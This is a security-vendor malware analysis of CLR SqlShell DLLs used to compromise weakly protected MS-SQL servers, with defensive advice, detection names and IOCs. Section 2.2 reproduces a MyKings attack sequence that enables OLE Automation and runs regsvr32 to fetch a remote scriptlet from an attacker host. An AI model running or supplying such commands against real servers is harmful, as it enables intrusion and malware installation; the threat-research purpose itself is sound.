Analysis of CLR SqlShell Used to Attack MS-SQL Servers

This blog post will analyze the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior. MS-SQL servers support a method known as CLR Stored Procedure which allows the usage of expanded features, and SqlShell is a DLL created with this method. CLR Stored Procedure is one of the major methods that threat actors can use to execute malicious commands in MS-SQL servers along with the xp_cmdshell command.

While CLR Stored Procedure contains a feature to execute given commands, it is possible that SqlShell was created for a legitimate purpose. However, it is being used in almost all attacks that target MS-SQL servers. Threat actors typically use SqlShell as a means to ultimately install malware such as CoinMiner or ransomware. In this blog post, we will analyze and cover the features supported by various types of SqlShells and the actual cases where they were used in attacks.

1. Overview

MS-SQL servers with simple passwords and are open publicly to the external internet are one of the main attack vectors used when targeting Windows systems. Threat actors find poorly managed MS-SQL servers and scan them before carrying out brute force or dictionary attacks to log in with admin privileges. Once the threat actors have reached this point, they then utilize various means to install malware and gain control over the infected systems.

After a threat actor logs in to an MS-SQL server with an admin account, the most common method used to install malware involves the xp_cmdshell command. Malicious commands that can even function in a Windows environment can be executed through this command. In addition, other means to execute Windows commands exist, such as registering commands to the OLE Stored Procedure or registering malicious commands in the task called MS-SQL Agent Jobs. Aside from the aforementioned command execution method, another technique exists where an executable implemented with specific features is created, registered, and made to perform those specific features. MS-SQL servers support Extended Stored Procedure and CLR Stored Procedure DLLs for those expanded features, allowing for certain features to be provided as developers create and register DLLs with their desired features.

AhnLab Security Emergency response Center (ASEC) has published quarterly statistics through the ASEC Report on malware strains that have been used in attacks against poorly managed MS-SQL servers. [1] According to the statistics, there is a considerable amount of malware categorized as CLR Shell (SqlShell). All of these are malware in the form of CLR Stored Procedure DLLs. Instead of using these pieces of malware on their own, most threat actors use them during the installation process of other malware, such as ransomware and CoinMiner.

The above figure covers the features provided by MS-SQL servers that can execute Windows OS commands and categorizes them by their actual malware. SqlShells come in various forms, some of which can execute commands, download/upload files, and even perform privilege escalation. Naturally, instead of receiving the threat actor’s commands, they also come in the form of downloaders that download and install malware from specific URLs.

2. Attack Methods Against MS-SQL

Generally, threat actors and malware search for environments where the MS-SQL service has been installed by scanning for servers with open 1433 ports. After the scanning process, they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks. Additionally, most features that make it possible to execute Windows OS commands require an SQL Admin (sa), in other words, an admin account.

There are cases where the threat actor does not personally perform the scan and dictionary attack, but instead, the malware spreads by self-propagating to poorly managed MS-SQL servers. The most notable in this case is the LemonDuck CoinMner. The following is a list of sa account passwords used by LemonDuck when performing dictionary attacks.

In addition, while LemonDuck uses dictionary attacks on MS-SQL servers during its internal propagation process, also known as lateral movement, Kingminer [2] and Vollgar CoinMiner [3] employ brute force attacks on externally accessible MS-SQL servers.

After obtaining an sa account or sa account privileges, the threat actor or malware either executes malicious commands or installs the actual malware to obtain control over the infected system. Additionally, sa account privileges only grant control over the MS-SQL database servers, and not the Windows OS itself. In other words, although the execution of SQL commands is allowed, features that can directly impact the Windows OS are not provided by default.

However, MS-SQL provides various features that allow the execution of OS commands in the Windows OS. Exploiting this ultimately allows the execution of OS commands. The section below will cover the methods that allow the execution of OS commands through MS-SQL database servers. These features have security vulnerabilities as they are not default SQL commands, so a majority of them are disabled by default. However, admin accounts can enable these settings, meaning that logging in to an admin account makes it possible to access these features. Therefore, control over a Windows OS can be obtained as a result of acquiring an sa account.

2.1. xp_cmdshell

xp_cmdshell commands have a feature that executes commands received as arguments in Windows shell. Windows commands executed as xp_cmdshell commands are run via “cmd.exe /c” commands by the sqlservr.exe process.

Out of the actual malware, LemonDuck downloads additional malware by utilizing xp_cmdshell. LemonDuck is also prepared for cases where xp_cmdshell is unregistered instead of disabled as it also includes a re-registration process.

2.2. OLE Stored Procedure

The method that uses the OLE Stored Procedure involves exploiting OLE’s feature to execute other applications. In this case, the other applications being the malicious commands or malware. OLE is also disabled like the xp_cmdshell commands, so it must be enabled as well.

The following is a reproduction of the actual attack routine used by the MyKings CoinMiner malware.

CMD > sqlcmd -S [IP 주소] -U sa -P testsql
1> sp_configure ‘show advanced options’, 1;
2> RECONFIGURE;
3> go
1> sp_configure ‘Ole Automation Procedures’,1;
2> RECONFIGURE;
3> go
1> DECLARE @shell INT
2> EXEC SP_OAcreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@shell OUTPUT
3> EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll’;
4> go

2.3. MS-SQL Agent Jobs

Like the method mentioned above, using the feature called MS-SQL Agent Jobs allows the registration of tasks that execute Windows commands. SQL Server Agent supports the simple CmdExec method that executes OS commands, and the ActiveScripting method that makes it possible to use JS or VBS scripts.

2.4. Extended Stored Procedure

MS-SQL servers support a method called the Extended Stored Procedure in order to provide an expanded range of features. Threat actors create malicious DLLs, registers them with the sp_addextendedproc command, and then executes the export function of the DLLs to load the malicious DLL and run the export function responsible for malicious behavior.

2.5. CLR Stored Procedure

The CLR Stored Procedure is similar to the above Extended Stored Procedure, but it can be distinguished by its use of .NET DLLs. In addition, an activation process like xp_cmdshell is required to register and use the CLR Stored Procedure.

As mentioned above, LemonDuck uses not only xp_cmdshell, but also the CLR Stored Procedure.

3. CLR SqlShell Analysis

3.1. Basic Type

In this section, SqlShells that only provide basic features such as command execution and file download will be covered. SqlShell is often used to install additional malware during attack processes, so even these simple forms are often found during attacks.

3.1.1. Command Execution (LEMONDUCK)

LemonDuck registers and uses the ExecCommand() method of the StoredProcedures class, and the ExecCommand() method calls the RunCommand() method internally. With the name evilclr.dll, its only functionality is a command execution routine. LemonDuck uses the CLR assembly’s ExecCommand() function registered in this way to download additional payloads.

3.1.2. Download Command Support (SHAW20211224)

Next is an SqlShell named “shaw20211224.dll” which provides not only the RunCommand() function that executes received commands, but also the DownloadRun() function that downloads external files, and the PutDatas() function that steals files from the received directories.

3.1.3. Shellcode Execution (Metasploit)

Additionally, Metasploit, a penetration testing tool, also supports attacks that target these MS-SQL servers. Metasploit provides various techniques ranging from the aforementioned dictionary attacks and privilege escalation, to executing various OS commands, and of course, the CLR SqlShell technique is also provided.

Metasploit installs the following SqlShell during the attack process, which is responsible for executing the received shellcode in the memory. Metasploit also provides simple forms of reverse shell, bind shell, and the Meterpreter backdoor which provides various other features. Metasploit executes a shellcode that installs the threat actor’s desired malware.

The following figure is a log from our AhnLab Smart Defense (ASD), which displays a threat actor breaching a poorly managed MS-SQL server and installing Metasploit’s “SqlClrPayload.dll” before executing the Metasploit’s Meterpreter backdoor in the memory of the sqlservr.exe process.

3.2. Types That Provide Extended Features

The SqlShells covered above have relatively simple forms, but threat actors are capable of utilizing SqlShells with a much broader range of features. The more features that are provided, the easier it becomes for threat actors to perform malicious behaviors such as malware installation.

3.2.1. SQLHELPER (TRIGONA Ransomware)

Most notably, an SqlShell named SqlHelper is also often used in attacks. Due to the high number of variations, it is believed that the source code is publicly available. Even the relatively simple malware below provides various features such as command execution, adding user accounts, tunneling, and file handling.

In addition, the SqlShell found in the previously covered Trigona ransomware [4] attack case was also SqlHelper. The SqlHelper used by the Trigona threat actor also contains an MS16-032 vulnerability attack routine for privilege escalation. The threat actor used this to execute the MS-SQL service with escalated privileges, and with that privilege, they registered the Trigona ransomware to the service.

3.2.2. CLRSQL (SHADOWFORCE Threat Group)

The SqlShell named CLRSQL is also similar to SqlHelper. When looking at the supported functions, such as tasks related to files/directories/processes/accounts, its similarity to WebShell malware is apparent.

When compared to the types covered above, CLRSQL SqlShells have even more features. For example, there are some that have been implemented with PingCastle. PingCastle is a tool that can be used to collect information required for attacks in Active Directory environments.

CLRSQL SqlShell implemented with PingCastle is also used during the ShadowForce threat group’s attack processes. ShadowForce is a threat group that has been active since 2013. They are known for their attacks focused on Korean businesses and agencies. Their tendency to mainly attack MS-SQL servers is one of their defining characteristics. [5]

Judging from how other malware that target poorly managed MS-SQL servers are also found in systems attacked by ShadowForce, it can be inferred that ShadowForce also targets systems that use poor account credentials.

The ASD log below shows the sequential creation of ShadowForce’s other malware after “Tmp1C4E.tmp”, which is the SqlShell, has been installed first. As such, ShadowForce uses the CLR Stored Procedure malware to install additional malware after breaching poorly managed MS-SQL servers. This flow of events can be observed similarly in most of their attack processes.

3.2.3. CLR_MODULE (SHADOWFORCE Threat Group)

The SqlShell named CLR_module is also similar to CLRSQL as it supports PingCastle along with other similar features. In terms of differences, CLR_module also provides privilege escalation tools such as BadPotato and EfsPotato in addition to the features provided by CLRSQL. It can be assumed that these additional features are the reason why there are many cases where CLRSQL is also found during the attack processes of ShadowForce.

3.3. CoinMiner Installation

In the section above, we covered the form similar to WebShell that would receive and execute specific commands from the threat actor. In this section, the SqlShells self-implemented with certain features will be covered. Most of these forms aim to install CoinMiner, and therefore, the SqlShells used in these attacks are usually responsible for functioning as downloaders or droppers.

3.3.1. MRBMINER

MrbMiner was one of the main CoinMiners that was distributed to MS-SQL servers in the past. [6] It was first confirmed in 2020, and it ultimately installs XMRig CoinMiner. The SqlShell used during the installation process of MrbMiner possesses its own analysis disruption techniques, but unlike the forms mentioned above, it only has a download feature to install MrbMiner.

Although they may vary according to the version, the following hard-coded C&C URLs can be directly confirmed.

3.3.2. MYKINGS

MyKings CoinMiner is distributed through various means, and is used in several methods of attacks against MS-SQL servers as well. The first method is the OLE Stored Procedure covered above, and there are other methods like the following, where CLR assembly is used via the ExecCode.dll file.

The SqlStoredProcedure1() method downloads a text file from a specific URL, which contains URLs where additional payloads can be downloaded. Afterward, it parses these URLs to install the actual MyKings payload. ExecCode.dll has a simple form like the one shown above, but more complex forms have been discovered among the CLR assemblies used by MyKings.

Similar to ExecCode.dll, MSSqlInterface.dll is also executed through the StoredProcedures class and SqlStoredProcedure() method, but it also provides additional features. First, it decrypts the C&C URL encoded into 0xFA as a 1-byte XOR during its initial routine. It then sends the basic information that has been stolen to the C&C server regularly on the main loop, and it downloads and executes files and shellcode.

3.3.3. LOVEMINER

As a CoinMiner that is being distributed to vulnerable MS-SQL servers, LoveMiner has been found with downloaders in the form of exe executables and CLR Stored Procedure. [7]

The LoveMiner downloader accesses a specific URL where it downloads and saves a Base64 encoded CoinMiner in the “C:\windows\temp\0c0134c0cbebf48be8c95920f5ea74fc.txt” path. If the file already exists, it reads and decodes it in Base64, and loads it into the memory.

After ultimately loading the CoinMiner DLL, the ExecSql() export function is called with the argument. This DLL is a customized XMRig that checks if the first string received as an argument is “getmoney#2021”. Afterward, it mines for Monero coins after parsing the mining pool address and ID received as the third argument.

Among the SqlShells that install LoveMiner, some even come in the form of a dropper instead of a downloader. XMRig CoinMiner is saved in the “gmp” internal resources, and SqlShell is responsible for loading this in the memory. As a customized XMRig, gmp configures the information required for mining like the mining pool address from the initial routine.

3.4. Proxyware Installation

Proxyware is a program that shares a part of the Internet bandwidth that is currently available on a system to others. Users who install the program are usually paid with a certain amount of cash in exchange for providing the bandwidth. While users can earn some money from installing proxyware on their systems, they should know they are taking risks by allowing external users to perform certain behaviors by using their networks. For instance, users cannot know in detail the companies that the proxyware platforms claim to use their services. Even if they can verify their customers on their own, it is impossible to check if your bandwidth will be maliciously exploited in the future or not.

Malware that installs proxyware without the consent of users have been covered before here in the ASEC Blog. [8] Systems that are infected with the malware have their network bandwidth stolen for threat actors to gain profit. The method of earning profit by using the infected system’s resources is similar to that of CoinMiner.

As can be seen in the ASD log, the threat actor installed a proxyware with the name “sdk.mdf” in an MS-SQL server and used an SqlShell to execute the proxyware and steal bandwidth. “sdk.mdf” is the DLL file responsible for the actual features, and the file itself only possesses the features provided by proxyware platforms.

However, the “Tmp417C.tmp” SqlShell that is created together loads the proxyware “sdk.mdf” and calls the p2p_start() export function so that it operates without users knowing. When calling p2p_start(), the email address to receive the profits must be transferred as an argument, and the threat actor’s email address can be confirmed in the following figure.

Additionally, the name of the SqlShell is “SqlServerWorks.CLR.P2P.dll”, which is similar to LoveMiner’s SqlShell, and it is assumed that they belong to the same threat actor as actual ASD logs have shown that LoveMiner and proxyware are often installed together.

4. Conclusion

Recently, the SqlShell malware is being installed on poorly managed MS-SQL database servers. SqlShell can install additional malware such as backdoors, CoinMiners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell.

Typical attacks that target MS-SQL database servers include brute force and dictionary attacks on systems where account credentials are poorly managed. In the case of MS-SQL servers that are targeted for attacks, there are many cases where they are installed together during the installation process of ERP and business solutions, in addition to being directly constructed as database servers.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for database servers accessible from outside to restrict access by threat actors.

File Detection
– CoinMiner/Win.Generic.R503247 (2022.07.08.00)
– CoinMiner/Win.Generic.R531037 (2022.10.20.02)
– CoinMiner/Win.Generic.R548410 (2023.01.04.01)
– Downloader/Win.MyKings.C2097492 (2022.03.28.03)
– Downloader/Win.MyKings.C4262789 (2022.03.28.03)
– Malware/Win.Generic.C4624149 (2021.09.06.02)
– Trojan/Win.Generic.C4819385 (2021.12.08.01)
– Trojan/Win.Generic.C4977493 (2022.02.22.00)
– Trojan/Win.LEMONDUCK.C4206511 (2022.02.17.01)
– Trojan/Win.SqlShell.C4975954 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975955 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975957 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975960 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975962 (2022.02.18.01)
– Trojan/Win.SqlShell.C5109399 (2022.05.02.01)
– Trojan/Win.SqlShell.C5271966 (2022.10.04.02)
– Trojan/Win.SqlShell.C5310256 (2022.11.21.03)
– Trojan/Win.SqlShell.C5310259 (2022.11.21.03)
– Trojan/Win.SqlShell.R473182 (2022.02.18.01)
– Trojan/Win.SqlShell.R473183 (2022.02.18.01)
– Trojan/Win.SqlShell.R489848 (2022.05.02.01)
– Trojan/Win.SqlShell.R535294 (2022.11.21.03)
– Trojan/Win.SqlShell.R546675 (2022.12.28.03)
– Trojan/Win.SqlShell.R549834 (2023.01.09.03)
– Trojan/Win.SqlShell.R567705 (2023.04.04.01)
– Trojan/Win.SqlShell.R576151 (2023.05.02.02)

IOC
MD5
– 383d20de8f94d12a6ded1e03f53c1e16: LemonDuck (evilclr.dll)
– 3e81a45507aea0945c57b67f193138a2: Simple SqlShell (test.dll)
– e16bd473c6dcfdc62053864c8a52060d: Simple SqlShell (dll.dll)
– 694d4270555f8b5e41a49990c8c62789: Simple SqlShell (shaw20211224.dll)
– 17606de13187c780ad3bf6caf2d1bd8c: Simple SqlShell (shaw20211224.dll)
– f0b837709ddde332bd2d7c8db9ccc1a2: Simple SqlShell (shaw20211224.dll)
– ba1772486fd114b3a384d012645ac905: Metasploit SqlShell (SqlClrPayload.dll)
– 46b639d59fea86c21e5c4b05b3e29617: SqlHelper – Trigona (sqlhelper.dll)
– b1c9a484d0fce8740438547694dbaadf: SqlHelper (sqlhelper.dll)
– ddec0377794f1e3d7c0cb4c93b1cb3c1: SqlHelper (sqlhelper.dll)
– 25dbf4f43b91bec3bfabac16b310bc08: SqlHelper (sqlhelper.dll)
– b3f1b115efe4d58145be73ba8e2033ea: SqlHelper (sqlhelper.dll)
– e4518c9f624775ebdbc4c26d70df4356: SqlHelper (sqlhelper.dll)
– 15c87480e0405b41f675222ef2bea95a: SqlHelper (sqlhelper.dll)
– 47cb400ee9d6cc9b951296b29488956b: SqlHelper (sqlhelper.dll)
– 7a7eb2d08f427644c37f771a2d174376: CLRSQL Type 1 (CLRSQL.dll)
– 7ae173b79f3adfa3dec15c49a51ea235: CLRSQL Type 1 (CLRSQL.dll)
– b37278c39d5eff637823b01f6dbb7c6d: CLRSQL Type 1 (SQLCLR.dll)
– 760cfbdd6abb9c0362feef3d6cad3d9b: CLRSQL Type 2 – ShadowForce (CLRSQL.dll)
– c3ce5aa5257d7a0d24c281a77b08c4d1: CLRSQL Type 2 – ShadowForce (CLRSQL.dll)
– 329f6d74299141fe06a5e222efcb06f8: CLR_module– ShadowForce (CLR_module.dll)
– cfbadc45f2ca5ecd4c663d37afd784a2: CLR_module (CLR_module.dll)
– 5d0ed9dc8864776021cf59099ca5af91: MrbMiner (Microsoft.SqlServer.Management.dll)
– b2ecc580203ec41fa007021db3f2aceb: MrbMiner (Microsoft.SqlServer.Management.dll)
– 6f3c3e5b69de7d192088ffb98a345e4d: MyKings (Operate.dll)
– 896ad50bcf14cf7fd26538bfa5a95899: MyKings (Operate.dll)
– 130d2b07a1c4cde8f0804df9fa9622d4: MyKings (MSSqlInterface.dll)
– 61fabf8842e7a93236b16f42cfc16d19: MyKings (MSSqlInterface.dll)
– 2f1aecbdb7ffcb0016de8ab734c0de44: MyKings (ExecCode.dll)
– 63609079a3e4af8643d33b05894e9670: LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 380702ee8884e4676d837a866b6be4c2: LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– b87734108c8065bd8c6bc5f4096debed: LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 3badb7bc10be12ddb710302e56445db9: LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 74b1a7e895df180d5d1fe60d4fc5fa69: LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– cc677b21dfda8718ab0431813bc7f0d2: LoveMiner – Dropper (Microsoft.SqlServer.WorksV7.dll)
– 012e607f99ecc5b108b292d72938456a: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 6ff71e8b324886e05deac82debc882af: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 1e92e397d0ad3d8006d99f81d913ffa1: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 281735b72906841ad705017ddf529440: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 7ff7fbd615ea5da6d5d07d6af6a0442c: LoveMiner – Downloader (SqlServerWorks.CLR.V2.dll)
– afd5b836bc4f6d276ba8cdf66afb7e93: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 281735b72906841ad705017ddf529440: LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– be12cf29d01de28944af89de391f2d9a: Proxyware (SqlServerWorks.CLR.P2P.dll)

Download URLs
– hxxp://js.f4321y[.]com:280/v.sct: MyKings
– hxxp://load2.wpd0126[.]info/pld: MyKings
– hxxp://load.wpd0126[.]info/pld: MyKings
– hxxp://load.wpd0126[.]info/pld: MyKings
– hxxp://c.getmoney[.]company/config.txt: LoveMiner
– hxxp://c.getmoney[.]company/ver.txt: LoveMiner
– hxxp://c.getmoney[.]company/data.txt: LoveMiner
– hxxp://c.getmoney[.]company/CLRV7/ver.txt: LoveMiner
– hxxp://c.getmoney[.]company/CLRV7/data.txt: LoveMiner
– hxxp://dl.love-network[.]cc/SqlBase.exe: LoveMiner

C&C URL
– 88.214.26[.]9:13785: Metasploit Meterpreter
– vihansoft[.]ir:3341: MrbMiner
– adminserver[.]online:1001: MrbMiner
– pcadmin[.]online:1001: MrbMiner
– 54.36.10[.]73:1001: MrbMiner

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Analysis of CLR SqlShell Used to Attack MS-SQL Servers appeared first on ASEC BLOG.

Article Link: Analysis of CLR SqlShell Used to Attack MS-SQL Servers - ASEC BLOG